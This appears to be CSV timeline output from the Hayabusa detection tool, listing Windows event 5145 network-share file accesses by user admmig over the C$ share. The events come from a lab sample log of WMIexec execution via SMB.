10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Contacts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Downloads\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Favorites\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Links\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Music\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Pictures\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Saved Games\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Searches\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Videos\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 